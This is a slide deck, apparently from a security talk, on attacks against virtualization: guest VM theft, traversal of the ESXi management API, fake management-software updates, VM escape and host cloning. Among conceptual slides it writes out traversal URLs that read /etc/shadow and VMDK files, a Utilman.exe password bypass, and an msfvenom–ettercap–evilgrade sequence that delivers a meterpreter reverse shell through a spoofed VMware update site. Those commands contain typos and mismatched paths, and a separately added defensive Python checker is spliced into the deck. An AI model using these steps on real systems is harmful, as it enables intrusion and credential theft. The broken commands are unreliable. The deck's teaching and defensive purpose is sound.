Virtualization security and threat
-
# WHO AM I
Senior Security Engineer, Penetration Testing, Incident Response
-
DISCLAIMERS
This presentation does not encourage people to hack.
(For educational purposes only)
AND
The presentation does not cover all parts of the virtualization technology area.
(It is rearranged from my thesis research literature review)
-
TOPIC
- Virtualization and hypervisor
- Virtualization threats and issues
- Vulnerability statistics of widely used hypervisors
- Guest VM attack
- Virtualization environment network attack
- Hypervisor attack
- Hypervisor management and API attack
- Host attack from VM
- Docker breakout by shocker
- Use virtualization as attack tools
- Security for virtualization
-
Virtualization
-
VIRTUALIZATION
Cloud, Google, iCloud
-
VIRTUALIZATION
-
VIRTUALIZATION
vSphere Client, vCenter
XenCenter
Virt-manager
-
Hypervisor
-
HYPERVISOR
-
HYPERVISOR
[Diagram: many guest VMs running on one hypervisor]
VMware Workstation
-
HYPERVISOR VS DOCKER
** Application containers
-
Virtualization Threats
-
Vulnerability Statistic
-
CVE-DETAIL
cvedetails.com
-
[Bar chart: bare-metal hypervisor vulnerabilities per year, 2008-2015 (source: cvedetails.com)]
-
[Chart: bare-metal hypervisor vulnerability types 2008-2015 (source: cvedetails.com); categories: DoS, Gain Privileges, Overflow, Code Execution, Gain Information, Memory Corruption, Bypass something, Directory Traversal, XSS; shares shown: 52%, 15%, 12%, 7%, 6.5%, 4.5%, 2%, 1%, 0.5%]
-
IS THE VIRTUALIZATION THREAT DIFFERENT FROM THE TRADITIONAL ENVIRONMENT?
-
Traditional
Application : Web , Web Service, Mail , FTP, DB
OS : Linux , Windows, Solaris
Hardware : CPU , Memory, Storage, NIC, Network
Attacks : XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, ARP Poisoning
-
Virtualization
Application : Web , Web Service, Mail , FTP, DB
OS : Linux , Windows, Solaris
Hypervisor components : Kernel , Lib, API, Network (additional attack surface)
Hardware : CPU , Memory, Storage, NIC, Network
Attacks : XSS, SQLi, Buffer overflow, Traversal, LFI, RFI, RCE, MitM, ARP Poisoning
-
GENERAL SECURITY ISSUES FOR VIRTUALIZATION
- Information leakage
- Unauthorized access (intentionally or unintentionally, by users or administrators)
- Data remaining in storage
- Data ownership
- Data migration at end of service
- Multi-tenancy / shared resources
- Use of a VM to commit fraud or crime
- Laws and regulations
-
VIRTUALIZATION TECHNICAL SECURITY ISSUE
-
GUEST VM ATTACK
- Traditional attacks according to services
- Guest VM attacks other guest VMs (same network segment)
- Guest VM attacks other guest VMs on the same hypervisor (VM hyper jumping)
- Cross-VM attack (side channel attack)
- Guest stealing
- Guest copy
-
TRADITIONAL ATTACK
Hypervisor
Guest VM1 Guest VM2
-
VM ATTACKS OTHERS VM
Hypervisor
Guest VM1 Guest VM2
-
VM HYPER JUMPING
Hypervisor
Guest VM1 Guest VM2
-
CROSS-VM ATTACK (SIDE CHANNEL)
Hypervisor
Guest VM1 Guest VM2
Time or computational power
-
GUEST STEALING
https://192.168.254.158:8333/sdk/../../../../../../root/vmpath/xxx.vmdk
Hypervisor
Management API
file
-
GUEST STEALING : VASTO
-
GUEST COPY (Authorized)
- Passwords
- OS
- Mail
- Cookies
- Browser history
- Sensitive data
- Databases
- Configurations
- Source codes
- Software licenses
- Many more...
-
GUEST COPY (Unauthorized)
Copy them
-
IF ( VM ==win7 or XP)
-
IF ( VM ==2008 or 2012)
How about password ?
-
IF ( VM ==2008 or 2012)
How about password ? Ans: Reset it !!!
-
Insert a CD to do a tricky password reset via the repair option
-
Copy cmd.exe over Utilman.exe and reboot
-
Press Windows Key + U
-
Bravo !!!
-
PS: http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html
Or add another account as administrator, hashdump,
and crack it with JTR
-
IF ( VM ==Unix) THEN single_mode ();
-
Forensic tools to access data: VMDK
-
Forensic tools to access data: Snapshot
-
NETWORK ATTACK
- Traditional attacks according to services
- vSwitch attack
- Sniffing
- Scanning
- MitM
-
- vSwitch Attack
Open vSwitch CVE-2012-3449 : insecure directory permissions vulnerability, Citrix XenServer vSwitch Controller version 6.0.2
-
- SNIFF
Not much sensitive in modern VM/Hypervisor
-
- SCAN
-
MANAGEMENT API
- Directory Traversal
- Brute Force Attack (auxiliary/scanner/vmware/vmware_http_login, Burp Suite Intruder)
- Response Splitting
-
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
VMware ESXi 3.5 or earlier fails to sufficiently sanitize user-supplied input data. Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system.
-
CVE-2009-3733 : ESXi Server Directory Traversal Vulnerability
https://192.168.254.158:8333/sdk/../../../../../../etc/shadow
Hypervisor
Management API
System file
-
ESX root password: crack it with JTR !!!
-
BRUTE FORCE ATTACK: by Metasploit VMware auxiliary modules
-
BRUTE FORCE ATTACK: by Burp Suite Intruder
-
NO-CVE : HTTP RESPONSE SPLITTING
-
MANAGEMENT ENVIRONMENT ATTACK
- Hooking
- MiTM
- Fake update (vmware-vilurker, Evilgrade)
-
HOOKING
-
MITM
Hypervisor
Management Software / Attacker / Hypervisor
-
MITM: Which picture shows we are under a MiTM attack ???
-
MITM
We never know !!!!
-
MITM: Which picture shows we are under a MiTM attack ???
-
MITM
We never know again!!!!
-
MITM
-
MITM : vSphere Client
-
MITM : XenCenter
-
FAKE MANAGEMENT SOFTWARE UPDATE
Concept
[Diagram: Admin, Internet, softwareupdate.vmware.com, ESXi; the attacker sits in the path via ARP Spoofing / Rogue DNS]
-
FAKE MANAGEMENT SOFTWARE UPDATE: by vmware_vilurker
Credit: Watcharaphon Wongaphai
-
FAKE MANAGEMENT SOFTWARE UPDATE
By Evilgrade
1. Create msfpayload > agent.exe (/usr/share/isr-evilgrade/agent/)
2. Create handler, wait for reverse connection
3. Add domain upgrade version into /etc/ettercap/etter.dns
4. ettercap -tqm arp:remote /victim/ /dnsserver real/ -> p, select dns_spoof
5. Run evilgrade
-
root@localhost:~# msfvenom p wondows/meterpreter/reverse_tcp LHOST=10.10.10.74 LPORT=8080 f exe > /opt/agemt.exe
root@localhost:~# cp /agent.exe /usr/share/isr-evilgrade/agent/agent.exe
root@localhost:~# echo "softwareupdate.vmware.com A 10.10.10.74" >> /usr/local/share/ettercap/etter.dns
root@localhost:~# sudo ettercap -tqm arp:remote // //
(press p, then select dns_spoof)
root@localhost:~# msfconsole
msf> use exploit multi/handler
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 10.10.10.74
msf> set LPORT 8080
msf> exploit
root@localhost:~# evilgrade
evilgrade> config vmware
evilgrade> start
-
FAKE MANAGEMENT SOFTWARE UPDATE: Result
-
FAKE MANAGEMENT SOFTWARE UPDATE
Result
[Diagram: Admin, Internet, softwareupdate.vmware.com, ESXi; ARP Spoofing / Rogue DNS]
-
HYPERVISOR ATTACK
- Compromised hypervisor (hyper-jacking): take full control, run a rogue hypervisor on top of an existing hypervisor, install hypervisor rootkits
- Denial of service (the hypervisor is a great single point of failure)
- Hypercall hooking/attack
-
- DENIAL OF SERVICE : PSOD
-
- HYPER CALL HOOKING ATTACK
XEN i386
Paravirtualization
-
- HYPER CALL HOOKING/ATTACK
EXAMPLE
CVE-2013-4553 : Xen DOMCTL_GETMEMLIST hypercall in Xen 3.4.x through 4.3.x
CVE-2012-3495 : Xen hypercall PHYSDEV_GET_FREE_PIRQ buffer overflow; denial of service; exploit code to execute in privilege
-
CVE-2014-4947 AND 4948 : LOCAL USERS DENY SERVICE AND OBTAIN POTENTIALLY SENSITIVE INFORMATION
CVSS v2 base score: 10.0 (High). Citrix XenServer 6.2 SP1 and prior versions: a local user on the guest system can trigger a buffer overflow in HVM (Hardware Virtual Machine) graphics console support.
Exploitation from the guest system can cause denial of service conditions and obtain potentially sensitive information.
-
[Diagram: three guest VMs on a hypervisor; the HVM graphic console sits between the guests and the hypervisor's resources]
[Sequence: a guest sends AAAAAAAAAAAAAAAAAAAA...AAAAA to the HVM graphic console; the input reaches the resources as AAAAAAAAAAAAAAAAx00x00x00, then xxxx]
-
CVE-2015-3456 : VENOM (Virtualized Environment Neglected Operations Manipulation)
Discovered by Jason Geffner, CrowdStrike senior security researcher.
The bug (buffer overflow) is in QEMU's virtual floppy disk controller (FDC). This vulnerable FDC code is used in numerous virtualization platforms and appliances, notably Xen, KVM, VirtualBox, and the native QEMU client.
An attacker needs administrative or root privileges in the guest operating system in order to exploit VENOM.
The VENOM vulnerability has existed since 2004, when the virtual floppy disk controller was first added to the QEMU codebase.
http://www.rapid7.com/resources/videos/venom-vulnerability-explained.jsp
-
Exploit to make a buffer overflow within the FDC and break out of the VM
Can access other VMs within that hypervisor
Can jump to other VMs in other hypervisors
Can access the underlying bare-metal system's hardware and use that to see other systems on the hypervisor's network
-
HOST ATTACK : VM ESCAPE
[Diagram: VM, Hypervisor, Resources, Host]
-
HOST ATTACK
- USING PATH TRAVERSAL VULNERABILITY IN VMWARE'S SHARED FOLDERS
- CVE-2008-0923
- INSUFFICIENT INPUT VALIDATION
VM ESCAPE
0xc2 0x2e 0xc2 0x2e (= 0x2e 0x2e = ..)
../../../../../../boot.ini
-
VM ESCAPE: modify VMFtp's source code to replace all occurrences of '+' with '\xc2' in an input pathname
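A defender-side path check for the two traversal shapes on these slides, the `/sdk/../` management-API request (CVE-2009-3733 and the guest-stealing slide) and the 0xC2-prefixed dots of the shared-folders slide (CVE-2008-0923, applied here to an HTTP path), written as an added Python example; it is not code from the deck or from VMware, and the log lines, the `/sdk` base path and the client addresses are constructed. It canonicalises a request path in the order a hardened handler should use and runs the same check over sample access-log lines.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

BASE = "/sdk"  # management-API prefix; every request must resolve under it
REQ_RE = re.compile(rb'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Constructed access-log lines (not from the deck): a benign SDK request, the
# '/sdk/../' shape, a percent-encoded variant, and 0xC2-prefixed dots.
SAMPLE_LOG = [
    b'10.0.0.5 - - "GET /sdk/vimService.wsdl HTTP/1.1" 200',
    b'10.0.0.9 - - "GET /sdk/../../../../../../etc/shadow HTTP/1.1" 200',
    b'10.0.0.9 - - "GET /sdk/..%2f..%2f..%2fetc/shadow HTTP/1.1" 200',
    b'10.0.0.9 - - "GET /sdk/\xc2.\xc2./root/vmpath/xxx.vmdk HTTP/1.1" 200',
]


def classify_path(raw: bytes) -> str:
    """Return 'ok', 'bad-encoding' or 'traversal' for one raw request path.

    Order matters: percent-decode, insist on strict UTF-8, normalise, then
    confine to BASE. Looking for '..' in the undecoded bytes is the mistake
    behind both traversal slides.
    """
    decoded = unquote_to_bytes(raw)  # %2e%2e -> '..', %2f -> '/'
    try:
        text = decoded.decode("utf-8", errors="strict")
    except UnicodeDecodeError:
        # 0xC2 followed by '.' is not valid UTF-8; decoders disagree on what
        # it means, so refuse it instead of guessing.
        return "bad-encoding"
    # normpath collapses '.' and '..'; the leading '/' keeps '..' from climbing above root
    resolved = posixpath.normpath("/" + text.lstrip("/"))
    if resolved == BASE or resolved.startswith(BASE + "/"):
        return "ok"
    return "traversal"


def scan_log(lines):
    """Return (client, verdict, path) for every request that is not 'ok'."""
    findings = []
    for line in lines:
        match = REQ_RE.search(line)
        if not match:
            continue
        verdict = classify_path(match.group(1))
        if verdict != "ok":
            findings.append((line.split(b" ", 1)[0].decode(), verdict, match.group(1)))
    return findings
```

The same `classify_path` order (decode, validate encoding, normalise, confine) is what a handler should run before touching the filesystem; in a log review, every non-`ok` verdict is worth a look at that client's other requests.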
-
VM ESCAPE
OR
-
VM ESCAPE
Modify the task schedule to add a new job that runs metX.exe, and put it back into /windows/tasks
-
VM ESCAPE
Generate meterpreter
Put the created task on the host
-
VM ESCAPE
Run the handler and wait until the task's run time
And compromised
-
CVE-2012-0217 : Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64-bit CPUs
Some 64-bit operating systems and virtualization software programs are vulnerable to local privilege escalation attacks when running on Intel processors (CPUs) that implemented the SYSRET instruction in their x86-64 extension. Attackers could exploit the vulnerability to force Intel CPUs to return a general protection fault in privileged mode.
Affected: Windows 7 and Windows Server 2008 R2, the 64-bit versions of FreeBSD and NetBSD, the Xen virtualization software, as well as Red Hat Enterprise Linux and SUSE Linux Enterprise Server, which include the Xen hypervisor by default.
Architecture vulnerability.
-
Architecture vulnerability. CVE-2012-0217 : Virtualization Software Vulnerable To Privilege Escalation Attacks On Intel 64-bit CPUs
[Screenshot: code]
-
MALICIOUS SCRIPT IN HYPERVISOR
-
ROP
Xen hypervisor exploitation utilizing return-oriented programming (ROP): it modifies the data in the hypervisor that controls whether a VM is privileged or not, and thus can escalate the privilege of an unprivileged domain (DomU).
-
ROP
-
ROP: make buffer overflow
-
ROP
Unfortunately, this technique needs a lot of factors to make it possible in today's hypervisors
-
FUZZING
-
USE VIRTUALIZATION AS ATTACK TOOL
- Host stealing (P2V host cloning)
VMware vCenter Converter Standalone
-
Victim : 10.200.1.10
Administrator
*************************
Hacker machine : 10.200.1.100 (ESX, VMware Workstation on hacker machine)
root
*************************
-
- Compromised host
- Get root/admin password
-
10.200.1.10 -> 10.200.1.100 (P2V clone)
Wait until finished
-
Don't forget to dump RAM, too!!! P2V doesn't copy the current data in RAM from the victim server
(Volatility, Meterpreter, pmdump)
-
Finish .... and completely PWN. Have more time to get:
- DB connection strings
- Server configurations
- Source code
- Crack more passwords
- Dig more sensitive files
-
But.. nothing is easy in real life
-
DOCKER BREAKOUT BY DOCKER SHOCKER
https://github.com/gabrtv/shocker
-
Security for Virtualization
-
SECURITY FOR VIRTUALIZATION
- Contract, law and regulation
- System segmentation: VLAN / SDN, dedicated management network, dedicated storage networks
- Protect all virtual system files (snapshot, VHDD, configuration)
- Update patches
- System hardening
- Implement security monitoring and detection tools
- Security assessment !!!!
- BCP / DRP
-
CONCLUSION
- Traditional attack methods can be used to attack virtualization technology
- Virtualization technology has more attack surfaces
- The hypervisor is considered a single point of failure
- Secure by design, security protection and hardening are important for virtualization technology
-